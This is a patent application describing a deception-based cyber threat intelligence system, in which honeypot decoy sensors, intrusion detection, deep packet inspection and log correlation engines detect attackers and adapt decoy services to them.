Description:[0001] The present subject matter, in general, relates to a field of cyber security, in particular, the present subject matter relates to a method and a system for implementing a threat intelligence service for preventing a cyber-attack on a network.
BACKGROUND

[0002] Cybersecurity teams across industries (enterprise, ICS and IoT) recognize that, despite there being a range of security tools and services in place, Cyber criminals still manage to bypass them and gain entry to infrastructures. Clearly, a new approach is required. Deception strategies are also a highly effective way to detect insider threats and provide actionable threat intelligence. Any host accessing deceptive elements is an indication that it is roaming in parts of the network where they have no authority. However, there have been some short comings in the already known intelligence systems as mentioned below.
[0003] Most of the available solutions for generating threat intelligence either provide local intelligence via the open source or proprietary threat feeds embedded with the monitoring services used for detecting the attacks happening at the decoy services, or they provide global intelligence by collating information about the threats reported at a global scale. These solutions fail to provide specific threat intelligence for the target environment, which contains the local intelligence in conjunction with the relevant information from specific global threat intelligence sources. This framework solves this problem by providing local as well as specific global intelligence using threat feeds, it also provides integrations for third party threat feeds.
[0004] Most of the deception based solutions provide only event/ alert logs which only provides information about the Tactics, Techniques and the procedures used by the attacker to compromise the system. Other solutions provide activity logs of the decoy services which highlights the actions taken by the attacker once he gains control over the service. These type of logs only provide isolated views of the attacks either from the network or the host (environment in which the decoy service is emulated) perspective. To completely analyse the impact of the attack, correlation of the event/ alert logs in conjunction with the activity log extracted from the deception environment can be used for detecting previously unknown threats which were not having any signatures available.
[0005] Furthermore, most deception solutions generate a large volume of data, much of which are irrelevant or false positives, making it challenging to distinguish between genuine threats and noise. Most of the solutions have provisions for either providing deception using honeypots on virtual machines or using honeypots as docker containers but not both. Nobody is using dynamic intelligent shifting sensors to get indicators of compromise.
[0006] Thus, there is a need for a solution to overcome the above-mentioned drawbacks.
OBJECTS OF THE DISCLOSURE
[0007] Some of the objects of the present disclosure, which at least one embodiment herein satisfy, are listed below.
[0008] It is a general or primary object of the present subject matter to provide a method for implementing a threat intelligence service for preventing a cyber-attack on a network.
[0009] It is another object of the present subject matter to provide dynamic intelligent shifting sensors with hybrid virtualization technology is aimed at providing a hardware and platform-agnostic framework which generates holistic 360degree threat intelligence covering each characteristic of attacks that can potentially happen in an environment. The framework accomplishes this by using a mechanism for generating analytics and intelligence by deploying adaptable and dynamic decoy services which are aimed at engaging the attackers into revealing their tactics, techniques and behavior.
[0010] It is another object of the present subject matter to provide a universal mechanism for deployment of the decoy services along with necessary monitoring and configuration services on the target environments such as On-Premise, Air-Gapped On Premise and Cloud IT infrastructure as well as OT and IoT Infrastructure.
[0011] It is another object of the present subject matter to provide automated installation facilities which require minimum user configuration effort for deploying the decoy and monitoring services.
[0012] It is another object of the present subject matter to provide maximum isolation of the environment where the decoy services running from the production environment so that even if the attacker compromises the decoy service and tries to breach into the environment laterally he would not able find any way to reach the production environment.
[0013] It is another object of the present subject matter to provide a logging mechanism that generates cumulative logs covering all the characteristics of the attacks detected by correlating the logs generated by different monitoring services such as event monitoring services, fingerprinting the target and attacker hosts and application logs created by the attackers on the target hosts.
[0014] It is another object of the present subject matter to provide a dedicated behavior analytics logs mechanism that correlates the logs produced by the network traffic monitoring service (DPI Engine) with the cumulative attack logs to generate logs that contain information about the relevant network activity of the attack in conjunction with other information that defines how the attack was carried out.
[0015] It is another object of the present subject matter to provide monitoring services that are used for detecting the attacks, having support for integration of external threat feeds, enabling the monitoring services to detect a wide variety of the latest attack techniques, tactics and procedures used by attackers.
[0016] It is another object of the present subject matter to provide dedicated mechanism for automatically updating and reconfiguring the decoy services based on external inputs enabling the decoy services to adapt to the specific threat landscape of the target environment.
[0017] It is another object of the present subject matter to provide mechanism for performing periodic clean-up and rebuild of the deception environment along with the decoy services for making the system resilient against the attacks encountered and also enabling the system to recover itself in the event of compromise.
[0018] These and other objects and advantages will become more apparent when reference is made to the following description and accompanying drawings.
SUMMARY
[0019] This summary is provided to introduce concepts related to a system implementing a threat intelligence service using deception for preventing a cyber- attack on a network. The system includes one or more decoy sensors amongst a plurality of decoy sensors. The one or more decoy sensors include a honeypot engine configured to detect at least one activity by an attacker, wherein the honeypot engine emulates a vulnerable service to lure the attacker, and capture data associated with the at least one activity and the attacker, wherein the data is logged by the one or more decoy sensors in a network event log. The one or more decoy sensors include an intrusion detection engine configured to detect an attack on the network by processing the network event log and generating a network activity log upon detecting the attack. The one or more decoy sensors include a Deep Packet Inspection (DPI) engine configured to analyse a network traffic associated with the network for generating detailed data associated with the network traffic based on the analysis. The one or more decoy sensors include a log consolidation and correlation engine configured to process the network event log, the network activity log, and the detailed data to generate a plurality of cumulative attack event and attack activity behavior logs, wherein a cumulative attack log amongst the plurality of cumulative attack event and attack activity behavior logs is extracted from a plurality of deception services and the plurality of cumulative attack event and attack activity behavior logs comprises one or more characteristics of the at least one activity of the attacker. The system further includes a log aggregation engine configured to analyse the cumulative attack log and determine an action for preventing the detected cyber-attack on the network. The system is configured to update and reconfigure the deception service based on one or more external inputs in order to adapt the deception service for extracting one or more new indicators of compromise used by the attacker for conducting the cyber-attack without being discovered as the deception service.
[0020] Various objects, features, aspects, and advantages of the inventive subject matter will become more apparent from the following detailed description of preferred embodiments, along with the accompanying drawing figures in which like numerals represent like components.
BRIEF DESCRIPTION OF THE DRAWINGS
[0021] The illustrated embodiments of the subject matter will be best understood by reference to the drawings, wherein like parts are designated by like numerals throughout. The following description is intended only by way of example, and simply illustrates certain selected embodiments of devices, systems, and methods that are consistent with the subject matter as claimed herein, wherein:
[0022] Fig. 1 illustrates a block diagram depicting an environment including a system for implementing a threat intelligence service using deception for preventing a cyber- attack on a network, in accordance with an embodiment of the present subject matter;
[0023] Fig, 2 illustrates a block diagram of the system, in accordance with an embodiment of the present subject matter;
[0024] Fig. 3 illustrates an operational flow diagram depicting a process for implementing a threat intelligence service using deception for preventing a cyber- attack on a network, in accordance with an embodiment of the present subject matter;
[0025] Fig. 4 illustrates a schematic block diagram depicting a decoy sensor and a log collection engine with each component, in accordance with an embodiment of the present subject matter; and
[0026] Fig. 5 illustrates a schematic block diagram depicting a method for implementing a threat intelligence service using deception for preventing a cyber- attack on a network, in accordance with an embodiment of the present subject matter.
DETAILED DESCRIPTION
[0027] The following is a detailed description of embodiments of the disclosure depicted in the accompanying drawings. The embodiments are in such detail as to clearly communicate the disclosure. However, the amount of detail offered is not intended to limit the anticipated variations of embodiments; on the contrary, the intention is to cover all modifications, equivalents, and alternatives falling within the scope of the present disclosure as defined by the appended claims.
[0028] As used in the description herein and throughout the claims that follow, the meaning of “a,” “an,” and “the” includes plural reference unless the context clearly dictates otherwise. Also, as used in the description herein, the meaning of “in” includes “in” and “on” unless the context clearly dictates otherwise.
[0029] Fig. 1 illustrates a block diagram 100 depicting an environment including a system 102 for implementing a threat intelligence service using deception for preventing a cyber- attack on a network, in accordance with an embodiment of the present subject matter. The system may be a cyber-threat Intelligence framework that generates an intelligence using a decoy technology. Threat data may be generated using multiple decoy sensors, and then aggregated and analyse d at a centralized collector for providing actionable analytics and insights on the characteristics of attacks detected. The system may be designed for security analysts and network administrators, providing an assistance to improve a security posture of the network by providing threat event logs.
[0030] Continuing with the above embodiment, the system may be configured to detect at least one activity by an attacker. Further, the system may be configured to emulates a vulnerable service to lure the attacker. The system may be configured to capture data associated with the at least one activity and the attacker. The data may be logged by the one or more decoy sensors in a network event log. Moving ahead, the system may be configured to detect an attack on the network. The attack may be detected by processing the network event log, further the system may be configured to generate a network activity log upon detecting the attack.
[0031] To that understanding, upon generating the network activity log, the system may be configured to analyse a network traffic associated with the network. The network traffic may be analysed for generating detailed data associated with the network traffic based on the analysis. Upon generation of the detailed data, the system may be configured to process the network event log, the network activity log, and the detailed data to generate a plurality of cumulative attack event and attack activity behavior logs. A cumulative attack log amongst the plurality of cumulative attack event and attack activity behavior logs may be extracted from a plurality of deception services and the plurality of cumulative attack event and attack activity behavior logs may include one or more characteristics of the at least one activity of the attacker.
[0032] Moving forward, the system may be configured to analyse the cumulative attack log and determine an action for preventing the detected cyber-attack on the network. The action may be determined based on identifying attributes of a malicious activity leading the to the attack that may aid in determining the action. The system is configured to update and reconfigure the deception service based on one or more external inputs in order to adapt the deception service for extracting one or more new indicators of compromise used by the attacker for conducting the cyber-attack without being discovered as the deception service.
[0033] Fig, 2 illustrates a block diagram 200 of the system 102, in accordance with an embodiment of the present subject matter. The system may be configured to implementing a threat intelligence service using deception for preventing a cyber- attack on a network. The system may be a framework that provides a distributed architecture for generation of threat intelligence using a central log collection module that performs a log correlation since a decoy sensor generates multiple types of logs and an aggregation system that can ingest log data from multiple decoy sensors. The system may be configured to act as an early warning system, provide a deception based detection, enable an actionable deception, and enhance a threat visibility.
[0034] In an example, the system 102 may include a processor 202, a memory 204, data 206, a number of decoy sensors 208, a data collector engine 210, a monitoring engine 222, a task scheduler engine 224, and a Dynamic Intelligent Shifting Sensor (DISS) engine 226. Each decoy sensor amongst the number of decoy sensors may include a honeypot engine 212, an intrusion detection engine 214, a Deep Packet Inspection (DPI) engine 216, and a log consolidation and correlation engine 218. The data collector engine 210 may include a log aggregation engine 220. In an example, the processor 202, the memory 204, data 206, the number of decoy sensors, and the data collector engine may be communicatively coupled to one another.
[0035] The system 102 may be understood as one or more of a hardware, a configurable hardware, and the like. In an example, the processor 202 may be a single processing unit or a number of units, all of which could include multiple computing units. Among other capabilities, the processor 202 may be configured to fetch and/or execute computer-readable instructions and/or data stored in the memory 204.
[0036] In an example, the memory 204 may include any non-transitory computer-readable medium known in the art including, for example, volatile memory, such as static random access memory (SRAM) and/or dynamic random access memory (DRAM), and/or non-volatile memory, such as read-only memory (ROM), erasable programmable ROM (EPROM), flash memory, hard disks, optical disks, and/or magnetic tapes. The memory 204 may further include the data 206.
[0037] The data 206 serves, amongst other things, as a repository for storing data processed, received, and generated by the system 102.
[0038] Continuing with the above embodiment, one or more decoy sensors amongst the number of decoy sensors may be deployed. A decoy sensor deployed is a part of a honey net that auto resets after a specific period and based on the processed data, the decoy sensor is selected from the plurality of decoy sensors for a next reset. The one or more decoy sensors may auto-heal themselves based on certain thresholds such as operational parameters like memory usage, disk usage, network usage and cpu utilization. The one or more decoy sensors may clean, reconfigure and updates themselves once these thresholds are crossed.
[0039] The honeypot engine 212 within the one or more decoy sensors may be configured to detect at least one activity by an attacker. The honeypot engine 212 may be configured to emulate a vulnerable service to lure the attacker. Upon detecting the at least one activity, the honeypot engine 212 may be configured to capture data associated with the at least one activity and the attacker, wherein the data is logged by the one or more decoy sensors in a network event log.
[0040] Moving forward, the intrusion detection engine 214 may also be configured to detect an attack on the network by processing the network event log and generating a network activity log upon detecting the attack.
[0041] To that understanding, the DPI engine 216 may be configured to analyse a network traffic associated with the network for generating detailed data associated with the network traffic based on the analysis. the DPI engine 216 may be configured to analyse the network traffic by extracting each attribute associated with each header component and each payload component of one or more network packets associated with the network traffic, comparing one or more characteristics of each attribute associated with one or more network packets and correlating the one or more characteristics with other logs generated by the monitoring services that provides specific threat intelligence information. The DPI engine 216 may further be configured to determine that each of the attribute is one of a malicious attribute or a benign attribute based on the comparison.
[0042] Subsequently, the log consolidation and correlation engine 218 may be configured to process the network event log, the network activity log, and the detailed data to generate a plurality of cumulative attack event and attack activity behavior logs. A cumulative attack log amongst the number of cumulative attack event and attack activity behavior logs may be extracted from a plurality of deception services and the plurality of cumulative attack events and attack activity behavior logs comprises one or more characteristics of the at least one activity of the attacker.
[0043] Continuing with the above embodiment, the log aggregation engine 220 within the data collector engine 210 may be configured to analyse the cumulative attack log and determine an action for preventing the detected cyber-attack on the network. The system may be configured to update and reconfigure the deception service based on one or more external inputs in order to adapt the deception service for extracting one or more new indicators of compromise used by the attacker for conducting the cyber-attack without being discovered as the deception service. The log aggregation engine 220 may be configured to analyse the cumulative attack log by aggregating the plurality of network event and the plurality of cumulative attack event and attack activity behavior logs for generating cumulative attack logs. The log aggregation engine 220 may be configured to extract a plurality of relevant features present in the logs required for a plurality of analysis on the network event and the attack generated, by the log aggregation engine 220, a plurality of augmented logs by generating behavior logs from the plurality of deception services. The log aggregation engine 220 may be configured to analyse the plurality of cumulative attack and attack activity behavior logs a statistical filter, a temporal filter, and a spatial data filter. The log aggregation engine 220 may be configured to perform a correlational and a statistical analysis of the attacks recorded on a plurality of the decoy sensors and extract the network event and attack activity behavior logs.
[0044] To that understanding, the DISS engine 226 may be configured to process data associated with the plurality of decoy sensors and the network being monitored by the plurality of sensors. The DISS engine 226 prevents an attacker from determining whether the plurality of decoy sensor is a honeypot or a production server. The DISS engine 226 may be configured to update the decoy services based on a plurality of external inputs comprising frequency, tactics and techniques as a nature of the deception services attacked to adapt to a specific threat landscape of a target environment. In a preferred embodiment, the deception services may be isolated by executing the deception service in one or more isolated containers deployed on a virtual machine. The one or more isolated containers may run in an isolated environment independent of one another to ensure that the attack cannot proliferate further to the virtual machine and to ensure if a container gets compromised then it cannot affect other containers to ensure layered protection by providing isolation using containerization and virtualization. This ensures that no lateral movement can happen even in case the sensors gets compromised. The deception service deployed in an environment may be cleaned up and rebuilt after a predetermined period of time.
[0045] Continuing with the above embodiment, the monitoring engine 222 that suggests new deception services for enhanced security deployment may be configured to monitor the deception service deployed in an environment, generate statistical data associated with the deception service based on monitoring the decoy service. The monitoring engine 222 may further be configured to determine another deception service to be deployed in future in the environment based on the statistical data and recommend the other deception service to a deploying engine as feedback, wherein the deploying engine is configured to deploy decoy services in the environment.
[0046] To that understanding, the system may include the task scheduler engine 224 that may be configured to perform a number of tasks such as cleaning container volumes, persistent memory, resetting the network interfaces and resetting and randomizing the user credentials of the deception services, that may be needed to further remove the persistence of the attacker in the containers of the deception services.
[0047] The system consisting the collector and the sensor may be designed on a micro service platform which makes it capable of scaling itself based on the input load, provided sufficient hardware is present. The limit of scalability is based on the hardware infrastructure provisioning (hardware system configuration in case of on -premise and limit of hardware infrastructure capacity provided by service provider in case of cloud provider).
[0048] Fig. 3 illustrates an operational flow diagram depicting a process 300 for implementing a threat intelligence service using deception for preventing a cyber- attack on a network, in accordance with an embodiment of the present subject matter. The process 300 may be performed by the system 100 as referred in the fig. 2. The process 300 may be based on cyber deception and may employ one or more deception techniques. Employing the one or more deception techniques may be an effective way to detect insider threats and provide an actionable threat intelligence on the network. A host accessing deceptive element may be an indication that it is roaming in parts of the network without an authority.
[0049] At step 302, the process 300 may include, detecting at least one activity by an attacker. The at least one activity may be detected by the honeypot engine 212 as referred in the fig .2. The honeypot engine 212 may be incorporated within the one or more decoy sensors as referred in the fig. 2. The honeypot engine 212 may be configured to emulates a vulnerable service to lure the attacker. In a preferred embodiment, the vulnerable service deception may work when the attacker interacts with the vulnerable service. Further, the at least one activity may be recorded in a form of attack logs upon a successful intrusion of the honeypot engine 212 emulating the vulnerable service.
[0050] At step 304, the process 300 may include, capturing data associated with the at least one activity and the attacker. The data may be capture by the honeypot engine 212 and the data may be logged by the one or more sensors. In a network event log.
[0051] At step 306, the process 300 may include, detecting an attack on the network by processing the network event log and generating a network activity log upon detecting the attack. The attack may be detected by an intrusion detection engine 214. The intrusion detection engine 214 may be incorporated within the one or more decoy sensors.
[0052] At step 308, the process 300 may include extracting each attribute associated with each header component and each payload component of one or more network packets associated with the network traffic. Each attributed may be extracted by the DPI engine 216 to analyse a network traffic associated with the network for generating detailed data associated with the network traffic based on the analysis.
[0053] At step 310, the process 300 may include comparing one or more characteristics of each attribute associated with one or more network packets and correlating the one or more characteristics with other logs generated by the monitoring services that provides specific threat intelligence information. To that understanding, the process 300 may include determining that each of the attribute is one of a malicious attribute or a benign attribute based on the comparison. The step 308 and 310 may be performed by the DPI engine 216 as referred in the fig. 2.
[0054] At step 312, the process 300 may include processing the network event log, the network activity log, and the detailed data to generate a plurality of cumulative attack event and attack activity behavior logs. A cumulative attack log amongst the plurality of cumulative attack event and attack activity behavior logs may be extracted from a plurality of deception services. The plurality of cumulative attack event and attack activity behavior logs may include one or more characteristics of the at least one activity of the attacker. The step 310 may be performed by the log consolidation and correlation engine 218.
[0055] At step 314, the process 300 may include, analyzing the cumulative attack log and determining an action for preventing the detected cyber-attack on the network by the data collector engine 210. The system may be configured to update and reconfigure the deception service based on one or more external inputs in order to adapt the deception service for extracting one or more new indicators of compromise used by the attacker for conducting the cyber-attack without being discovered as the deception service. analyzing the cumulative attack log may include aggregating, by the log aggregation engine 220, the plurality of network event and the plurality of cumulative attack event and attack activity behavior logs for generating cumulative attack logs. Analyzing may also include extracting, by the log aggregation engine 220, a plurality of relevant features present in the logs required for a plurality of analysis on the network event and the attack generated, by the log aggregation engine 220, a plurality of augmented logs by generating behavior logs from the plurality of deception services and analyzing, by the log aggregation engine 220, the plurality of cumulative attack and attack activity behavior logs a statistical filter, a temporal filter, and a spatial data filter. Analyzing may further include performing, by the log aggregation engine 220, a correlational and a statistical analysis of the attacks recorded on a plurality of the decoy sensors and extract the network event and attack activity behavior logs.
[0056] Fig. 4 illustrates a schematic block diagram 400 depicting a decoy sensor and a log collection engine with each component, in accordance with an embodiment of the present subject matter. The bloc diagram 400 may disclose the components of the system 100. The system 100 may be configured to provide a provision for dynamically updating the deception services based on external inputs. Deception services may be needed to be adaptable to a target environment's threat landscape for extracting better specific threat intelligence. That may be achieved by provisioning a feedback mechanism that recommends the decoy service deployer about services to be deployed based on statistical data about already deployed services, hence making the system adaptable for each target environment.
[0057] Continuing with the above embodiment, the system 100 may provide a mechanism for layered isolation of the deception services from the production environment. This may be achieved by the providing both software and hardware isolation in layers, the software isolation is achieved by executing the deception services in containers and those containers are deployed on a virtual machine which provides better hardware isolation.
[0058] Further, the DPI Engine may be configured to monitor and analyse the network traffic. The deep packet inspection engine processes the live network traffic and extracts all attributes of the header and payload components of the network packets and provides detailed information about the network packets which enables in profiling the network traffic on the basis of the analysis of the characteristics of the attributes of the network packets constituting the traffic and categorizing it whether the traffic is malicious or benign based on correlation with other threat feeds. The system 100 may further include generating cumulative attack logs covering all the characteristics of the attacks detected by correlating the logs generated by different monitoring services such as event monitoring services, fingerprinting the target and attacker hosts and application logs created by the attackers on the target hosts. That may provide a 360degree view of the tactics, techniques and procedures with reference to activities of the attacker within the context of a particular attack. The system 100 may also further analyse characteristics of attackers' activity for extracting specific patterns that may be used for attacker profiling such that it may help in figuring out whether the attacker is carrying out generic attacks for exploring the environment or the target is a specific service.
[0059] Fig. 5 illustrates a schematic block diagram depicting a method 500 for implementing a threat intelligence service using deception for preventing a cyber- attack on a network, in accordance with an embodiment of the present subject matter.
[0060] At block 502, the method 500 includes detecting, by a honeypot engine, at least one activity by an attacker, wherein the honeypot engine emulates a vulnerable service to lure the attacker.
[0061] At block 504, the method 500 includes capturing, by the honeypot engine, data associated with the at least one activity and the attacker, wherein the data is logged by the one or more decoy sensors in a network event log.
[0062] At block 506, the method 500 includes detecting, by an intrusion detection engine, an attack on the network by processing the network event log and generating a network activity log upon detecting the attack.
[0063] At block 508, the method 500 includes analyzing, by a Deep Packet Inspection (DPI) engine, a network traffic associated with the network for generating detailed data associated with the network traffic based on the analysis.
[0064] At block 510, the method 500 includes processing, by a log consolidation and correlation engine, the network event log, the network activity log, and the detailed data to generate a plurality of cumulative attack event and attack activity behavior logs, wherein a cumulative attack log amongst the plurality of cumulative attack event and attack activity behavior logs is extracted from a plurality of deception services and the plurality of cumulative attack event and attack activity behavior logs comprises one or more characteristics of the at least one activity of the attacker.
[0065] At block 512, the method 500 includes analyzing, by a log aggregation engine, the cumulative attack log and determine an action for preventing the detected cyber-attack on the network, wherein the system is configured to update and reconfigure the deception service based on one or more external inputs in order to adapt the deception service for extracting one or more new indicators of compromise used by the attacker for conducting the cyber-attack without being discovered as the deception service.
[0066] While the detailed description describes various embodiments of the invention, other and further embodiments of the invention may be devised without departing from the basic scope thereof. The scope of the invention is determined by the claims that follow. The invention is not limited to the described embodiments, versions, or examples, which are included to enable a person having ordinary skill in the art to make and use the invention when combined with information and knowledge available to the person having ordinary skill in the art.
, Claims:We claim:
1. A system (102) implementing a threat intelligence service using deception for preventing a cyberattack on a network, the system (102) comprising:
one or more decoy sensors amongst a plurality of decoy sensors (208) comprising:

a honeypot engine (212) configured to:

detect at least one activity by an attacker, wherein the honeypot engine (212) emulates a vulnerable service to lure the attacker; and
capture data associated with the at least one activity and the attacker, wherein the data is logged by the one or more decoy sensors in a network event log;
an intrusion detection engine (214) configured to detect an attack on the network by processing the network event log and generating a network activity log upon detecting the attack;
a Deep Packet Inspection (DPI) engine (216) configured to analyse a network traffic associated with the network for generating detailed data associated with the network traffic based on the analysis;
a log consolidation and correlation engine (218) configured to process the network event log, the network activity log, and the detailed data to generate a plurality of cumulative attack event and attack activity behavior logs, wherein a cumulative attack log amongst the plurality of cumulative attack event and attack activity behavior logs is extracted from a plurality of deception services and the plurality of cumulative attack event and attack activity behavior logs comprises one or more characteristics of the at least one activity of the attacker; and
a data collector engine (210) comprising:
a log aggregation engine (220) configured to analyse the cumulative attack log and determine an action for preventing the detected cyber-attack on the network, wherein the system (102) is configured to update and reconfigure the deception service based on one or more external inputs in order to adapt the deception service for extracting one or more new indicators of compromise used by the attacker for conducting the cyber-attack without being discovered as the deception service.
2. The system (102) as claimed in claim 1, wherein analyzing the cumulative attack logs comprises:
aggregating, by the log aggregation engine (220), the plurality of network event and the plurality of cumulative attack event and attack activity behavior logs for generating cumulative attack logs;
extracting, by the log aggregation engine (220), a plurality of relevant features present in the logs required for a plurality of analysis on the network event and the attack generated, by the log aggregation engine (220), a plurality of augmented logs by generating behavior logs from the plurality of deception services;
analyzing, by the log aggregation engine (220), the plurality of cumulative attack and attack activity behavior logs a statistical filter, a temporal filter, and a spatial data filter; and
performing, by the log aggregation engine (220), a correlational and a statistical analysis of the attacks recorded on a plurality of the decoy sensors and extract the network event and attack activity behavior logs.
3. The system (102) as claimed in claim 1, further comprising:
processing, by a Dynamic Intelligent Shifting Sensor (DISS) engine (226), data associated with the plurality of decoy sensors (208) and the network being monitored by the plurality of sensors, wherein the DISS engine (226) prevents an attacker from determining whether the plurality of decoy sensor is a honeypot or a production sensor; and
updating and reconfiguring, by the DISS engine (226), the decoy services based on a plurality of external inputs comprising frequency, tactics and techniques as a nature of the deception services attacked to adapt to a specific threat landscape of a target environment.
4. The system (102) as claimed in claim 1, wherein a decoy sensor deployed is a part of a honeynet that auto resets after a specific period and based on the processed data, the decoy sensor is selected from the plurality of decoy sensors (208) for a next reset.
5. The system (102) as claimed in claim 3, wherein the deception service is isolated by executing the deception service in one or more isolated containers deployed on a virtual machine, wherein the one or more isolated containers run in an isolated environment independent of one another.
6. The system (102) as claimed in claim 1, further comprising:
a monitoring engine (222) that suggests new deception services for enhanced security deployment, configured to:
monitor the deception service deployed in an environment;

generate statistical data associated with the deception service based on monitoring the decoy service;
determine another deception service to be deployed in future in the environment based on the statistical data; and
recommend the other deception service to a deploying engine as feedback, wherein the deploying engine is configured to deploy decoy services in the environment.
7. The system (102) as claimed in claim 1, wherein analyzing a network traffic associated with the network comprises:
extracting, by the DPI engine (216), each attribute associated with each header component and each payload component of one or more network packets associated with the network traffic;
comparing, by the DPI engine (216), one or more characteristics of each attribute associated with one or more network packets and correlating the one or more characteristics with other logs generated by the monitoring services that provides specific threat intelligence information; and
determining, by the DPI engine (216), that each of the attribute is one of a malicious attribute or a benign attribute based on the comparison.
8. The system (102) as claimed in claim 1, wherein the deception service deployed in an environment is cleaned up and rebuilt after a predetermined period of time.
9. The system (102) as claimed in claim 1, wherein the system (102) deployed to emulate the vulnerable service is scalable.
10. A method (500) implementing a threat intelligence service using deception for preventing a cyberattack on a network, the method (500) comprising:
detecting, by a honeypot engine (212), at least one activity by an attacker, wherein the honeypot engine (212) emulates a vulnerable service to lure the attacker;
capturing, by the honeypot engine (212), data associated with the at least one activity and the attacker, wherein the data is logged by the one or more decoy sensors in a network event log;
detecting, by an intrusion detection engine (214), an attack on the network by processing the network event log and generating a network activity log upon detecting the attack;
analyzing, by a Deep Packet Inspection (DPI) engine, a network traffic associated with the network for generating detailed data associated with the network traffic based on the analysis;
processing, by a log consolidation and correlation engine (218), the network event log, the network activity log, and the detailed data to generate a plurality of cumulative attack event and attack activity behavior logs, wherein a cumulative attack log amongst the plurality of cumulative attack event and attack activity behavior logs is extracted from a plurality of deception services and the plurality of cumulative attack event and attack activity behavior logs comprises one or more characteristics of the at least one activity of the attacker; and
analyzing, by a log aggregation engine (220), the cumulative attack log and determine an action for preventing the detected cyber-attack on the network, wherein the system (102) is configured to update and reconfigure the deception service based on one or more external inputs in order to adapt the deception service for extracting one or more new indicators of compromise used by the attacker for conducting the cyber-attack without being discovered as the deception service.